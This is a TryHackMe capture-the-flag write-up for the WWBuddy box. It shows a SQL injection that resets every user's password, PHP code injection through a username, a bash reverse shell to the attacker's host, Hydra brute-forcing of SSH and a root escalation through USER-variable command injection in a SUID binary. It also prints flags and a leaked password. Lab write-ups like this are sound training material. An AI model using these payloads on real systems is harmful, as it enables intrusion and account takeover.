TryHackMe WriteUp
World wide buddy is a site for making friends, but it’s still unfinished and it has some security flaws.
TryHackMe WWBuddy — Enumeration
The first step of the enumeration is finding out which ports on the server are open. We do so by using nmap. Run the following command:
Only ports 22 and 80 are open. The service on port 22 is a SSH server and the server on port 80 is a web server running Apache. Let’s enumerate the web server!
Enumeration Web server
Start a gobuster scan to find hidden directories and files by running the following command:
gobuster dir -u http://10.10.105.98 -x php,txt,zip,bak -w /usr/share/wordlists/dirb/common.txt
The output is as follows
/admin (Status: 301) [Size: 312] [ → http://10.10.105.98/admin/]
/api (Status: 301) [Size: 310] [ → http://10.10.105.98/api/]
/change (Status: 301) [Size: 313] [ → http://10.10.105.98/change/]
/chat.php (Status: 200) [Size: 1129]
/config.php (Status: 200) [Size: 0]
/images (Status: 301) [Size: 313] [ → http://10.10.105.98/images/]
/index.php (Status: 302) [Size: 7740] [ → /login]
/index.php (Status: 302) [Size: 7740] [ → /login]
/js (Status: 301) [Size: 309] [ → http://10.10.105.98/js/]
/login (Status: 301) [Size: 312] [ → http://10.10.105.98/login/]
/logout.php (Status: 302) [Size: 0] [ → /login]
/profile (Status: 301) [Size: 314] [ → http://10.10.105.98/profile/]
/register (Status: 301) [Size: 315] [ → http://10.10.105.98/register/]
/server-status (Status: 403) [Size: 277]
/styles (Status: 301) [Size: 313] [ → http://10.10.105.98/styles/]
When browsing to http://10.10.105.98/admin we find the following text:
This page might only be allowed for a specific set of users. Let’s leave it for now and check the web page itself.
Next, we create an account and see what kind of functionality is hidden behind the dashboard. After you create your account, log in! You should now see the following page:
The trick here is to change the username in a SQL injection payload. The payload will make sure that whenever this user’s password is updated, all passwords from all users will be updated and have the same value. This can be done using SQL injections. Change the username to the following: ‘ or 1=1 — -
Click the Edit Info
Click the Change Password
Do not forget to add an e-mail address and a date of birth as well. Any valid date and email address will do. The next step is to change the password. Change the password to adminadmin and log out. Now try to log in using the credentials: WWBuddy:test123. You should now see the following page:
Nice, we just changed the password for all the users in the system. This means that we can log in by providing any username we can find with the adminadmin password. Inside the current dashboard we see two new users; Roberto and Henry. Furthermore we are able to read their messages, but there is nothing to be found there. Roberto only replied with a Hi Bot after the welcome message. Now try to log in as the next user: Henry
Hanry Dashboard
We find some interesting messages sent between Roberto and Henry here. The default password of some user is equal to his or her date of birth. In an earlier step we found an admin page. Let’s try to access this page once again:
Access Henry user: /admin/
One interesting thing about this page is that the field username which has no input sanitization is directly reflected. So now we can create a username with <?php system('id') ?> and can get code execution on the server. Login for Roberto
Login Roberto and Change UserName: <?php system('id') ?>
Access /admin/ Directory this User
Access /admin/ Directory Henry User
We get code execution and get our first flag.Using <?php system($_GET['cmd']) ?> gave an error for some reason, so I created a file called shell.sh on my box with reverse shell payload, opened up an http server using python and fetched the file first and executed on the second time as there was a limit on how long the username should be. Change the Roberto
Nice we can inject any command now. You can use the following command to craft your reverse shell
Access /admin/ Directory Henry User
Nice we can inject any command now. You can use the following command to craft your reverse shell: bash -i >& /dev/tcp/Own-ip/4444 0>&1 Url-encoding shell run And Run the Listener
curl -H ‘Cookie: PHPSESSID=jt7p68up85hcuuj79eq6uhs77e’ http://10.10.71.176/admin/?cmd=%70%68%70%20%2d%{Logn code}%29%3b%27
TTY Shell Upgrade
python -c “import pty;pty.spawn(‘/bin/bash’)”
Horizontal Privilege Escalation
After some time we find an interesting log file containing passwords. This file is: cat /var/log/mysql/general.log
Roberto:yVnocsXsf%X68wf
Trying to login as roberto
Roberto home directory
Content of importante.txt
$ cat importante.txt
A Jenny vai ficar muito feliz quando ela descobrir que foi contratada :DD
Não esquecer que semana que vem ela faz 26 anos, quando ela ver o presente que eu comprei pra ela, talvez ela até anima de ir em um encontro comigo.
THM{g4d0_d+_kkkk}
Tranlation
Information of file importante.txt
The file was created on 2020–07–27. So lets create a wordlist to bruteforce jenny‚Äôs password. Earlier the birthday on the webapp was in the format mm/dd/yyyy, so created the wordlist accordingly.
Create WordList
08/01/1994
08/02/1994
08/03/1994
08/04/1994
08/05/1994
08/06/1994
08/07/1994
08/08/1994
08/09/1994
08/10/1994
07/28/1994
07/29/1994
07/30/1994
07/31/1994
07/32/1994
08/11/1994
08/01/1995
08/02/1995
08/03/1995
08/04/1995
08/05/1995
08/06/1995
08/07/1995
08/08/1995
08/09/1995
08/10/1995
08/11/1995
07/28/1995
07/29/1995
07/30/1995
07/31/1995
07/32/1995
Using hydra to bruteforce SSH password
After a while we find the password of jenny and we can use SSH to log in as jenny. Run
improve the shell again. python -c “import pty;pty.spawn(‘/bin/bash’)”
Horizontal Privilege Escalation
Listing all SUID binaries
find / -type f -perm -4000 -ls 2>/dev/null
jenny@wwbuddy:~$ find / -type f -perm -4000 -ls 2>/dev/null
66 40 -rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8268/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8268/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8268/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/8268/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Oct 10 2019 /snap/core/8268/bin/umount
…………….
…………….
267949 12 -rwsr-xr-x 1 root root 8584 Jul 28 2020 /bin/authenticate
…………….
jenny@wwbuddy:~$ id
uid=1002(jenny) gid=1002(jenny) groups=1002(jenny)
Download authenticate file:/bin/authenticate
local@local:~/Documents/tryhackme/wwbuddy$ scp roberto@10.10.39.232:/bin/authenticate authenticate
roberto@10.10.39.232's password:
authenticate 100% 8584 22.8KB/s 00:00
Now import the binary in Ghidra so that we can reverse engineer the code. You should see the following source code:
undefined8 main(void)
{
__uid_t __uid;
int iVar1;
char *__src;
long in_FS_OFFSET;
undefined8 local_48;
undefined8 local_40;
undefined8 local_38;
undefined8 local_30;
undefined8 local_28;
undefined4 local_20;
undefined local_1c;
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
__uid = getuid();
if ((int)__uid < 1000) {
puts("You need to be a real user to be authenticated.");
}
else {
iVar1 = system("groups | grep developer");
if (iVar1 == 0) {
puts("You are already a developer.");
}
else {
__src = getenv("USER");
__uid = getuid();
setuid(0);
local_48 = 0x20646f6d72657375;
local_40 = 0x6c6576656420472d;
local_38 = 0x207265706f;
local_30 = 0;
local_28 = 0;
local_20 = 0;
local_1c = 0;
strncat((char *)&local_48,__src,0x14);
system((char *)&local_48);
puts("Group updated");
setuid(__uid);
system("newgrp developer");
}
}
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}Executing commands as root user
Privilege Escalation
jenny@wwbuddy:~$ id
uid=1002(jenny) gid=1002(jenny) groups=1002(jenny)
jenny@wwbuddy:~$ export USER=”; bash”
jenny@wwbuddy:~$ /bin/authenticate
Usage: usermod [options] LOGIN
Options:
-c, — comment COMMENT new value of the GECOS field
-d, — home HOME_DIR new home directory for the user account
-e, — expiredate EXPIRE_DATE set account expiration date to EXPIRE_DATE
-f, — inactive INACTIVE set password inactive after expiration
to INACTIVE
-g, — gid GROUP force use GROUP as new primary group
-G, — groups GROUPS new list of supplementary GROUPS
-a, — append append the user to the supplemental GROUPS
mentioned by the -G option without removing
him/her from other groups
-h, — help display this help message and exit
-l, — login NEW_LOGIN new value of the login name
-L, — lock lock the user account
-m, — move-home move contents of the home directory to the
new location (use only with -d)
-o, — non-unique allow using duplicate (non-unique) UID
-p, — password PASSWORD use encrypted password for the new password
-R, — root CHROOT_DIR directory to chroot into
-s, — shell SHELL new login shell for the user account
-u, — uid UID new UID for the user account
-U, — unlock unlock the user account
-v, — add-subuids FIRST-LAST add range of subordinate uids
-V, — del-subuids FIRST-LAST remove range of subordinate uids
-w, — add-subgids FIRST-LAST add range of subordinate gids
-W, — del-subgids FIRST-LAST remove range of subordinate gids
-Z, — selinux-user SEUSER new SELinux user mapping for the user account
root@wwbuddy:~#
Root Flag
root@wwbuddy:/root# cat root.txt
THM{ch4ng3_th3_3nv1r0nm3nt}
I really enjoyed rooting this box. The box taught me some useful tricks about SQL injections. Furthermore, I learned how environment variables can be abused to gain higher privileges! The last lesson here is to keep your passwords safe. Never communicate about your passwords in any form at all!
